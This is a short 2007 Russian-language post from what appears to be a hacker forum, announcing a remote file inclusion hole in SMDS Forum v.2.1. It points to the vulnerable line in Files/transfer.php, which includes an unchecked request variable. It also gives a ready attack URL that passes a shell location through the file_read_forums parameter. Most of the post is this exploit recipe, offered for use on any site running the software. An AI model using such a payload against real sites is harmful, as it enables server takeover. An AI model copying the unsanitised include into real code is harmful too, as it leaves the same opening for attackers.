01.09.2007, 17:58
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
SMDS Forum v.2.1 remote file inclusion
Только что нашел удаленный инклуд в скриптах форума. Посмотреть описание форума и скачать сам движок можно здесь. Хотя форум и очень старый, но погуглив по теме:
Код:
SMDS Forum v.2.1 php inclusion
ничего не нашел.
Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код:
PHP код:
include $file_read_forums;
позволяет провести атаку на форум:
Код:
http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]
Последний раз редактировалось The_HuliGun; 01.09.2007 в 18:16..
|
|
|